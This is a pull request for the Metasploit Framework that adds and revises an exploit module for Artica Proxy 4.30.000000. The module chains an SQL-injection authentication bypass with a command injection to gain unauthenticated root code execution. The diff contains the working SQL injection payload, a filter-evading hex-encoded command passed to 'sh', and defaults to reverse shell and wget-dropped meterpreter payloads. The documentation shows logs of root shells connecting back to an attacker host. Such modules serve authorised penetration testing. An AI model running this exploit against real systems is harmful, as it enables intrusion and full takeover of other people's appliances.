### PR TITLE
[Module] Artica Proxy Auth Bypass + RCE

### DIFF
--- a/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md
+++ b/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md
@@ -60,8 +60,6 @@ id
 uid=0(root) gid=0(root) groups=0(root)
 ```
 
-
-
 #### Cmd payload : `cmd/unix/reverse_perl`
 
 ```
@@ -78,16 +76,4 @@ id
 uid=0(root) gid=0(root) groups=0(root)
 whoami
 root
-```
-
-#### Bypassing authentication
-
-```
-msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit 
-
-[*] Started reverse TCP handler on 192.168.1.222:4444 
-[*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection)
-[+] Session cookie : dcccb1ba861a87b56a2f92febf273846
-[*] Exploit completed, but no session was created.
-msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > 
 ```

--- a/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md
+++ b/documentation/modules/exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.md
@@ -1,0 +1,93 @@
+## Vulnerable Application
+
+### Introduction
+
+This module exploits two vulnerabilities on Artica Proxy (version 4.30.000000 and lower),
+an authentication bypass and an authenticated remote code execution, the authentication bypass
+is due to an SQL injection vulnerability present in fw.login.php.
+
+Because the application runs in virtual appliance, successful exploitation yields code execution
+as root on the target system.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection`
+3. Do: `set RHOSTS [RHOSTS]`
+4. Do: `check`
+5. Verify if `check` detects vulnerable hosts as it should
+6. Do: `exploit`
+7. Verify if the payload was successfully executed on the target (that you get a session)
+
+## Options
+
+### PHPSESSID
+
+The session cookie, if you have one.
+If not set, the module will attempt to bypass authentication using the authentication bypass vulnerability.
+
+## Scenarios
+
+### Artica Proxy 4.26, 4.30.000000
+
+#### Using a dropper / getting a native meterpreter shell (TARGET being Linux Dropper)
+
+```
+msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit 
+
+[*] Started reverse TCP handler on 192.168.1.222:4444 
+[*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection)
+[+] Session cookie : 9a171f6964f8b35f53abf652d2b28748
+[*] Using URL: http://0.0.0.0:8080/f0Y1VFKK4nAW
+[*] Local IP: http://192.168.1.222:8080/f0Y1VFKK4nAW
+[*] Attempting to gain RCE via CVE-2020-17505
+[*] Client 192.168.1.223 (Wget/1.20.1 (linux-gnu)) requested /f0Y1VFKK4nAW
+[*] Sending payload to 192.168.1.223 (Wget/1.20.1 (linux-gnu))
+[*] Meterpreter session 1 opened (192.168.1.222:4444 -> 192.168.1.223:48330) at 2020-08-30 16:45:58 +0200
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : www.red0xff.co
+OS           : Debian 10.2 (Linux 4.19.0-6-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > shell
+Process 2724 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+
+
+#### Cmd payload : `cmd/unix/reverse_perl`
+
+```
+msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > 
+msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit 
+
+[*] Started reverse TCP handler on 192.168.1.222:4444 
+[*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection)
+[+] Session cookie : 1049da6bfa8e6217072f810a9b62ff7b
+[*] Attempting to gain RCE via CVE-2020-17505
+[*] Command shell session 7 opened (192.168.1.222:4444 -> 192.168.1.223:48466) at 2020-08-30 16:50:15 +0200
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+whoami
+root
+```
+
+#### Bypassing authentication
+
+```
+msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > exploit 
+
+[*] Started reverse TCP handler on 192.168.1.222:4444 
+[*] Attempting to bypass authentication via CVE-2020-17506 (SQL injection)
+[+] Session cookie : dcccb1ba861a87b56a2f92febf273846
+[*] Exploit completed, but no session was created.
+msf5 exploit(linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection) > 
+```

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Arch' => ARCH_CMD,
             'Type' => :unix_command,
             'DefaultOptions' => {
-              'PAYLOAD' => 'cmd/unix/reverse_perl',
+              'PAYLOAD' => 'cmd/unix/reverse_perl'
             }
           ],
           [
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Type' => :linux_dropper,
             'DefaultOptions' => {
               'CMDSTAGER::FLAVOR' => 'wget',
-              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp',
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
             }
           ],
           [
@@ -90,9 +90,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    @phpsessid = datastore['PHPSESSID'] || auth_bypass
-    unless @phpsessid
-      return CheckCode::Safe("Authentication failed")
+    if datastore['PHPSESSID']
+      @phpsessid = datastore['PHPSESSID']
+    else
+      check_result = auth_bypass
+      return check_result unless check_result == CheckCode::Vulnerable
+
+      @phpsessid = check_result.reason
     end
     rand_string = Rex::Text.rand_text_alphanumeric(4..16)
     if execute_command("echo #{Rex::Text.encode_base64(rand_string)}|base64 -d").include?(rand_string)
@@ -108,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'),
       'vars_get' => {
-        'service-cmds-peform' => "||#{Rex::Text::uri_encode(cmd, 'hex-all')}||"
+        'service-cmds-peform' => "||#{Rex::Text.uri_encode(cmd, 'hex-all')}||"
       },
       'cookie' => "PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1"
     })
@@ -125,8 +129,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'apikey' => apikey
       }
     })
-    return unless res && [200, 301, 302].include?(res.code)
-    res.get_cookies[/PHPSESSID=(.+?);/,1]
+    return Exploit::CheckCode::Unknown("Unable to connect to #{target_uri.path}") unless res
+    return Exploit::CheckCode::Safe('Authentication failed') unless res && [200, 301, 302].include?(res.code)
+
+    Exploit::CheckCode::Vulnerable(res.get_cookies[/PHPSESSID=(.+?);/, 1])
   end
 
   def exploit
@@ -134,10 +140,12 @@ class MetasploitModule < Msf::Exploit::Remote
       @phpsessid = datastore['PHPSESSID']
     else
       print_status 'Attempting to bypass authentication via CVE-2020-17506 (SQL injection)'
-      @phpsessid = auth_bypass
-    end
-    unless @phpsessid
-      fail_with(Failure::NoAccess, "Authentication failed")
+      bypass_result = auth_bypass
+      case bypass_result
+      when CheckCode::Safe then fail_with(Failure::NoAccess, bypass_result.reason)
+      when CheckCode::Unknown then fail_with(Failure::Unknown, bypass_result.reason)
+      else @phpsessid = bypass_result.reason
+      end
     end
     print_good "Session cookie : #{@phpsessid}"
     case target['Type']
@@ -145,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :linux_dropper then execute_cmdstager
     when :auth_bypass then nil
     else
-      fail_with(Failure::BadConfig, "Invalid target specified")
+      fail_with(Failure::BadConfig, 'Invalid target specified')
     end
   end
 end

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -94,8 +94,8 @@ class MetasploitModule < Msf::Exploit::Remote
     unless @phpsessid
       return CheckCode::Safe("Authentication failed")
     end
-    rand_string = Rex::Text.rand_text_alphanumeric(rand(4..16))
-    if execute_command("echo${IFS}#{rand_string}").include?(rand_string)
+    rand_string = Rex::Text.rand_text_alphanumeric(4..16)
+    if execute_command("echo #{rand_string}").include?(rand_string)
       CheckCode::Appears
     else
       CheckCode::Safe
@@ -127,11 +127,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'apikey' => apikey
       }
     })
-    if res && [200, 301, 302].include?(res.code)
-      cookie = res.get_cookies[/PHPSESSID=(.+?);/,1]
-      return cookie if cookie
-    end
-    nil
+    return unless res && [200, 301, 302].include?(res.code)
+    return res.get_cookies[/PHPSESSID=(.+?);/,1]
   end
 
   def exploit
@@ -141,11 +138,10 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status 'Attempting to bypass authentication via CVE-2020-17506 (SQL injection)'
       @phpsessid = auth_bypass
     end
-    if @phpsessid
-      print_good "Using session cookie : #{@phpsessid}"
-    else
+    unless @phpsessid
       fail_with(Failure::NoAccess, "Authentication failed")
     end
+    print_good "Using session cookie : #{@phpsessid}"
     case target['Type']
     when :unix_command then execute_command(payload.encoded)
     when :linux_dropper then execute_cmdstager

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -119,7 +119,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def auth_bypass
-    apikey = "' UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"
+    serialized_object = 'a:2:{s:3:"uid";s:4:"-100";s:22:"ACTIVE_DIRECTORY_INDEX";s:1:"1";}'
+    apikey = "' UNION select 1,'#{Rex::Text.encode_base64(serialized_object)}';"
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'fw.login.php'),

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Arch' => ARCH_CMD,
             'Type' => :unix_command,
             'DefaultOptions' => {
-              'PAYLOAD' => 'cmd/unix/reverse_perl'
+              'PAYLOAD' => 'cmd/unix/reverse_perl',
             }
           ],
           [
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Type' => :linux_dropper,
             'DefaultOptions' => {
               'CMDSTAGER::FLAVOR' => 'wget',
-              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp',
             }
           ],
           [
@@ -106,12 +106,11 @@ class MetasploitModule < Msf::Exploit::Remote
     # particularity: cmd can't contain spaces, or some characters from a blacklist (+ included for example)
     print_status 'Attempting to gain RCE via CVE-2020-17505'
     # this should bypass the filtering
-    cmd = "echo #{Rex::Text.to_hex(cmd, '')}|xxd -r -p|sh".gsub(/ /, '${IFS}')
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'),
       'vars_get' => {
-        'service-cmds-peform' => "||#{cmd}||"
+        'service-cmds-peform' => "||#{Rex::Text::uri_encode(cmd, 'hex-all')}||"
       },
       'cookie' => "PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1"
     })

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
             ['CVE', '2020-17506'], # Auth bypass
             ['EDB', '48744'],
             ['PACKETSTORM', '158868'],
-            ['URL', 'https://blog.max0x4141.com/post/artica_proxy/'],
+            ['URL', 'https://blog.max0x4141.com/post/artica_proxy/']
           ],
         'DefaultOptions' =>
           {

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Arch' => ARCH_CMD,
             'Type' => :unix_command,
             'DefaultOptions' => {
-              'PAYLOAD' => 'cmd/unix/reverse_bash'
+              'PAYLOAD' => 'cmd/unix/reverse_perl'
             }
           ],
           [
@@ -62,8 +62,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
           [
             'Authentication bypass',
-            'Platform' => 'Linux',
-            'Arch' => [ARCH_X86, ARCH_X64],
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
             'Type' => :auth_bypass,
           ]
         ],
@@ -141,11 +141,13 @@ class MetasploitModule < Msf::Exploit::Remote
     unless @phpsessid
       fail_with(Failure::NoAccess, "Authentication failed")
     end
-    print_good "Using session cookie : #{@phpsessid}"
+    print_good "Session cookie : #{@phpsessid}"
     case target['Type']
     when :unix_command then execute_command(payload.encoded)
     when :linux_dropper then execute_cmdstager
-    when :auth_bypass then auth_bypass
+    when :auth_bypass then nil
+    else
+      fail_with(Failure::BadConfig, "Invalid target specified")
     end
   end
 end

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Safe("Authentication failed")
     end
     rand_string = Rex::Text.rand_text_alphanumeric(4..16)
-    if execute_command("echo #{rand_string}").include?(rand_string)
+    if execute_command("echo #{Rex::Text.encode_base64(rand_string)}|base64 -d").include?(rand_string)
       CheckCode::Appears
     else
       CheckCode::Safe
@@ -103,9 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    # particularity: cmd can't contain spaces, or some characters from a blacklist (+ included for example)
     print_status 'Attempting to gain RCE via CVE-2020-17505'
-    # this should bypass the filtering
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'),
@@ -128,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
     return unless res && [200, 301, 302].include?(res.code)
-    return res.get_cookies[/PHPSESSID=(.+?);/,1]
+    res.get_cookies[/PHPSESSID=(.+?);/,1]
   end
 
   def exploit

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' =>
           [
             'Max0x4141', # discovery
-            'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, msf module
+            'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # msf module
           ],
         'References' =>
           [

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -59,12 +59,6 @@ class MetasploitModule < Msf::Exploit::Remote
               'CMDSTAGER::FLAVOR' => 'wget',
               'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
             }
-          ],
-          [
-            'Authentication bypass',
-            'Platform' => 'linux',
-            'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
-            'Type' => :auth_bypass
           ]
         ],
         'Privileged' => true,
@@ -151,7 +145,6 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :unix_command then execute_command(payload.encoded)
     when :linux_dropper then execute_cmdstager
-    when :auth_bypass then nil
     else
       fail_with(Failure::BadConfig, 'Invalid target specified')
     end

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
   def initialize(info = {})
@@ -93,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     @phpsessid = datastore['PHPSESSID'] || auth_bypass
     unless @phpsessid
-      fail_with(Failure::NoAccess, "Authentication failed")
+      return CheckCode::Safe("Authentication failed")
     end
     rand_string = Rex::Text.rand_text_alphanumeric(rand(4..16))
     if execute_command("echo${IFS}#{rand_string}").include?(rand_string)
@@ -120,7 +119,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def auth_bypass
-    print_status 'Attempting to bypass authentication via CVE-2020-17506 (SQL injection)'
     apikey = "' UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"
     res = send_request_cgi({
       'method' => 'GET',
@@ -131,16 +129,23 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     if res && [200, 301, 302].include?(res.code)
       cookie = res.get_cookies[/PHPSESSID=(.+?);/,1]
-      if cookie
-        print_good "Got authentication cookie: #{cookie}"
-        return cookie
-      end
+      return cookie if cookie
     end
-    print_error 'Failed to bypass the authentication via CVE-2020-17506'
     nil
   end
 
   def exploit
+    if datastore['PHPSESSID']
+      @phpsessid = datastore['PHPSESSID']
+    else
+      print_status 'Attempting to bypass authentication via CVE-2020-17506 (SQL injection)'
+      @phpsessid = auth_bypass
+    end
+    if @phpsessid
+      print_good "Using session cookie : #{@phpsessid}"
+    else
+      fail_with(Failure::NoAccess, "Authentication failed")
+    end
     case target['Type']
     when :unix_command then execute_command(payload.encoded)
     when :linux_dropper then execute_cmdstager

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Authentication bypass',
             'Platform' => 'linux',
             'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
-            'Type' => :auth_bypass,
+            'Type' => :auth_bypass
           ]
         ],
         'Privileged' => true,

--- a/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
+++ b/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb
@@ -6,17 +6,18 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Artica proxy 4.30.000000 Remote Code Execution',
+        'Name' => 'Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection',
         'Description' => %q{
           This module exploits an authenticated command injection vulnerability in Artica Proxy, combined with an authentication bypass
           discovered on the same version, it is possible to trigger the vulnerability without knowing the credentials.
-          The webserver usually runs as root, successful exploitation of this vulnerability yields remote code execution as root on the
+          The application runs in virtual appliance, successful exploitation of this vulnerability yields remote code execution as root on the
           remote system.
         },
         'License' => MSF_LICENSE,
@@ -67,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Type' => :auth_bypass,
           ]
         ],
-        'Privileged' => false,
+        'Privileged' => true,
         'DisclosureDate' => 'Aug 9 2020',
         'DefaultTarget' => 1,
         'Notes' => {
@@ -80,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/']),
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Artica Proxy', '/']),
         OptString.new('PHPSESSID', [false, 'The cookie obtained after successful authentication, if present'])
       ]
     )
@@ -89,12 +90,25 @@ class MetasploitModule < Msf::Exploit::Remote
     import_target_defaults
   end
 
+  def check
+    @phpsessid = datastore['PHPSESSID'] || auth_bypass
+    unless @phpsessid
+      fail_with(Failure::NoAccess, "Authentication failed")
+    end
+    rand_string = Rex::Text.rand_text_alphanumeric(rand(4..16))
+    if execute_command("echo${IFS}#{rand_string}").include?(rand_string)
+      CheckCode::Appears
+    else
+      CheckCode::Safe
+    end
+  end
+
   def execute_command(cmd, _opts = {})
     # particularity: cmd can't contain spaces, or some characters from a blacklist (+ included for example)
     print_status 'Attempting to gain RCE via CVE-2020-17505'
     # this should bypass the filtering
     cmd = "echo #{Rex::Text.to_hex(cmd, '')}|xxd -r -p|sh".gsub(/ /, '${IFS}')
-    send_request_cgi({
+    res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'),
       'vars_get' => {
@@ -102,6 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'cookie' => "PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1"
     })
+    res ? res.body : ''
   end
 
   def auth_bypass
@@ -115,10 +130,10 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
     if res && [200, 301, 302].include?(res.code)
-      cookie = res.get_cookies
-      unless cookie.nil? || !cookie.include?('PHPSESSID=')
+      cookie = res.get_cookies[/PHPSESSID=(.+?);/,1]
+      if cookie
         print_good "Got authentication cookie: #{cookie}"
-        return cookie[/PHPSESSID=(.+?);/, 1]
+        return cookie
       end
     end
     print_error 'Failed to bypass the authentication via CVE-2020-17506'
@@ -126,9 +141,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @phpsessid = datastore['PHPSESSID'] || auth_bypass
-    return unless @phpsessid
-
     case target['Type']
     when :unix_command then execute_command(payload.encoded)
     when :linux_dropper then execute_cmdstager

--- a/modules/exploits/linux/http/artica_proxy_rce.rb
+++ b/modules/exploits/linux/http/artica_proxy_rce.rb
@@ -29,6 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             ['CVE', '2020-17505'], # RCE
             ['CVE', '2020-17506'], # Auth bypass
+            ['EDB', '48744'],
+            ['PACKETSTORM', '158868'],
             ['URL', 'https://blog.max0x4141.com/post/artica_proxy/'],
           ],
         'DefaultOptions' =>

--- a/modules/exploits/linux/http/artica_proxy_rce.rb
+++ b/modules/exploits/linux/http/artica_proxy_rce.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PHPSESSID', [false, 'The cookie obtained after successful authentication, if present'])
       ]
     )
-    
+
     # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
     import_target_defaults
   end

--- a/modules/exploits/linux/http/artica_proxy_rce.rb
+++ b/modules/exploits/linux/http/artica_proxy_rce.rb
@@ -1,0 +1,136 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Artica proxy 4.30.000000 Remote Code Execution',
+        'Description' => %q{
+          This module exploits an authenticated command injection vulnerability in Artica Proxy, combined with an authentication bypass
+          discovered on the same version, it is possible to trigger the vulnerability without knowing the credentials.
+          The webserver usually runs as root, successful exploitation of this vulnerability yields remote code execution as root on the
+          remote system.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Max0x4141', # discovery
+            'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, msf module
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-17505'], # RCE
+            ['CVE', '2020-17506'], # Auth bypass
+            ['URL', 'https://blog.max0x4141.com/post/artica_proxy/'],
+          ],
+        'DefaultOptions' =>
+          {
+            'SSL' => true,
+            'RPort' => 9000
+          },
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix Command',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_command,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          ],
+          [
+            'Linux Dropper',
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :linux_dropper,
+            'DefaultOptions' => {
+              'CMDSTAGER::FLAVOR' => 'wget',
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+            }
+          ],
+          [
+            'Authentication bypass',
+            'Platform' => 'Linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :auth_bypass,
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => 'Aug 9 2020',
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/']),
+        OptString.new('PHPSESSID', [false, 'The cookie obtained after successful authentication, if present'])
+      ]
+    )
+    
+    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
+    import_target_defaults
+  end
+
+  def execute_command(cmd, _opts = {})
+    # particularity: cmd can't contain spaces, or some characters from a blacklist (+ included for example)
+    print_status 'Attempting to gain RCE via CVE-2020-17505'
+    # this should bypass the filtering
+    cmd = "echo #{Rex::Text.to_hex(cmd, '')}|xxd -r -p|sh".gsub(/ /, '${IFS}')
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'),
+      'vars_get' => {
+        'service-cmds-peform' => "||#{cmd}||"
+      },
+      'cookie' => "PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1"
+    })
+  end
+
+  def auth_bypass
+    print_status 'Attempting to bypass authentication via CVE-2020-17506 (SQL injection)'
+    apikey = "' UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'fw.login.php'),
+      'vars_get' => {
+        'apikey' => apikey
+      }
+    })
+    if res && [200, 301, 302].include?(res.code)
+      cookie = res.get_cookies
+      unless cookie.nil? || !cookie.include?('PHPSESSID=')
+        print_good "Got authentication cookie: #{cookie}"
+        return cookie[/PHPSESSID=(.+?);/, 1]
+      end
+    end
+    print_error 'Failed to bypass the authentication via CVE-2020-17506'
+    nil
+  end
+
+  def exploit
+    @phpsessid = datastore['PHPSESSID'] || auth_bypass
+    return unless @phpsessid
+
+    case target['Type']
+    when :unix_command then execute_command(payload.encoded)
+    when :linux_dropper then execute_cmdstager
+    when :auth_bypass then auth_bypass
+    end
+  end
+end


### PR DESCRIPTION
This PR adds a working module exploiting an authentication bypass in `Artica proxy`, and a post-auth RCE as root (two vulnerabilities), when combined, it's possible for unauthenticated users to obtain RCE as root on the target system.

## New

At the time of creating this PR, the latest Official release is still vulnerable (`4.30.000000`)

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/artica_proxy_rce.rb`
- [ ] set `target` to the target you want to test
- [ ] **Verify** the payload executes and the exploit works (you get a shell, meterpreter or whatever).

## Todo

Needs:

- documentation
- a check method (on the auth bypass, or the RCE?)
- Reviewing

Any help on this module is greatly appreciated.